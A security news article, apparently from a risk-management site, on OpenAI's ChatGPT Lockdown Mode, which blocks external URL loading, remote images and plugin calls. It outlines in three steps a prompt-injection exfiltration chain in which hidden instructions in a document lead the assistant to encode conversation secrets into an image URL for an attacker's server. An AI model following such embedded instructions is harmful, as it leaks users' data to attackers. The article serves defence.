Skip to content
⚖️ Risk Mgmt

OpenAI Rolls Out ChatGPT Lockdown Mode to Block Prompt-Injection Data Exfiltration

OpenAI has released ChatGPT Lockdown Mode, a security configuration that prevents ChatGPT from loading external URLs, rendering images from arbitrary sources, or executing third-party plugin calls — the primary vectors for prompt-injection attacks that cause ChatGPT to exfiltrate data to attacker-controlled endpoints. Enterprise and education customers can now enforce Lockdown Mode organisation-wide via the admin console.

4 min read
#openai#chatgpt#prompt-injection#ai-security#lockdown-mode#enterprise-ai#data-exfiltration#llm-security
Article security-risk-management

OpenAI has released Lockdown Mode for ChatGPT, a security configuration that restricts the AI’s external communication capabilities to prevent the most common class of prompt-injection data exfiltration attack. When enabled, ChatGPT will not load external URLs provided in user prompts, will not render images from arbitrary remote sources, and will not make calls to third-party plugins or custom GPT actions that retrieve external content.

The feature is available for ChatGPT Enterprise and ChatGPT Edu accounts, enforceable organisation-wide by administrators through the admin console. Individual Plus and Team users can enable it per-session from the settings panel.

The Threat Lockdown Mode Addresses

Prompt-injection attacks against AI assistants exploit a fundamental characteristic of large language model systems: the model cannot reliably distinguish between instructions from the authorised user and instructions embedded in content it processes. When ChatGPT reads a document, browses a webpage, or processes an image, adversarial instructions embedded in that content can redirect the model’s behaviour.

The most damaging class of these attacks combines prompt injection with an exfiltration channel. An attacker who controls a webpage or document that a user will ask ChatGPT to process can embed instructions that cause ChatGPT to:

  1. Extract sensitive information from the conversation (email content, document text, API keys the user has shared)
  2. Construct a URL encoding that exfiltrated data
  3. Request that URL as an image or resource load — sending the data to an attacker-controlled server

This attack class has been demonstrated repeatedly in research settings and has been reported in real-world incidents involving users who asked ChatGPT to summarise emails containing embedded malicious content, or to analyse documents from unknown sources.

Lockdown Mode prevents the exfiltration step: by disabling ChatGPT’s ability to load external URLs or make external API calls, the attack chain is broken even if the prompt injection instruction is successfully embedded in content.

What Lockdown Mode Restricts

Disabled in Lockdown Mode:

  • External URL loading from user prompts
  • Image rendering from arbitrary remote URLs (including tracking pixels and exfiltration beacons)
  • Third-party plugin API calls
  • Custom GPT action calls that retrieve external content
  • Code interpreter file exfiltration via network calls

Remains available in Lockdown Mode:

  • Text generation and analysis
  • Code generation (no execution)
  • File analysis (PDF, documents) for text content
  • ChatGPT’s built-in capabilities that do not require external network calls
  • Browsing capability remains available but restricted to a curated set of approved domains (configurable by enterprise admins)

Enterprise Configuration

For ChatGPT Enterprise organisations, Lockdown Mode is enforced through the admin console under Settings → Security → Content and Connectivity Controls. The configuration allows:

  • Global Lockdown Mode: All users in the organisation run in Lockdown Mode by default; individual users cannot override
  • Group-level policies: Apply Lockdown Mode to specific user groups (e.g., finance, legal, HR) that handle sensitive documents while allowing broader access for other groups
  • Approved browsing domains: Whitelist specific domains that ChatGPT may load in Lockdown Mode (e.g., internal documentation sites, specific trusted research sources)

Enterprise DLP integration: ChatGPT Enterprise’s DLP connectors (available for Microsoft Purview and Forcepoint) can be configured to flag conversations in which users share content classified as sensitive. Lockdown Mode reduces the risk that sensitive content shared with ChatGPT can be exfiltrated via prompt injection; DLP policies provide visibility into what content is being shared in the first place.

Limitations and Residual Risk

Lockdown Mode addresses the external exfiltration vector but does not prevent:

  • In-context data leakage: If a user is deceived into asking ChatGPT to summarise a malicious document, the output of that summarisation may include attacker-crafted content that misleads the user
  • Plugin architecture exceptions: Custom GPTs with pre-approved actions configured by the enterprise administrator can still make external calls — the security of those integrations depends on the action’s implementation
  • User-driven exfiltration: Lockdown Mode does not prevent a user from voluntarily copying and pasting ChatGPT output to external systems

The feature represents a meaningful reduction in the AI prompt-injection attack surface, not a complete elimination. Enterprise security programmes should combine Lockdown Mode with user awareness training on AI risks and DLP policies that cover AI platforms as a data handling channel.

Share this article

Related Intelligence

⚖️ Risk Mgmt

Anthropic's Claude Mythos AI Discovers Thousands of Zero-Days Across Every Major OS — Project Glasswing Offers Private Access

Anthropic's specialised vulnerability-hunting AI, Claude Mythos, has systematically discovered thousands of zero-day vulnerabilities across Windows, macOS, Linux, and major browsers — including a 17-year-old NFS RCE in FreeBSD and a 27-year-old OpenBSD denial-of-service. Project Glasswing provides private early access to Microsoft, Google, Apple, and select others. The implications for enterprise risk governance are immediate.

#ai-security +5
⚖️ Risk Mgmt

DOJ Seizes CFAKE.com and SOCFAKE.com in First Criminal Enforcement Under the TAKE IT DOWN Act

US authorities seized two of the largest non-consensual deepfake pornography platforms in a joint operation with French and Italian law enforcement, marking the first major criminal enforcement action under the TAKE IT DOWN Act signed into law in May 2025. A French national was arrested in Nice on 10 June; cryptocurrency proceeds have been seized pending forfeiture.

#deepfake +5
⚖️ Risk Mgmt

Europol Dismantles AudiA6 Cryptocurrency Laundering Service That Processed €336M+ for Ransomware Gangs

Europol, in coordination with German BKA, Dutch FIOD, and Lithuanian law enforcement, has dismantled AudiA6 — a professional cryptocurrency money laundering service that processed more than €336 million in criminal proceeds for ransomware groups including Conti, REvil, and BlackCat/ALPHV. Seven individuals have been arrested across three countries and the service's infrastructure seized.

#europol +7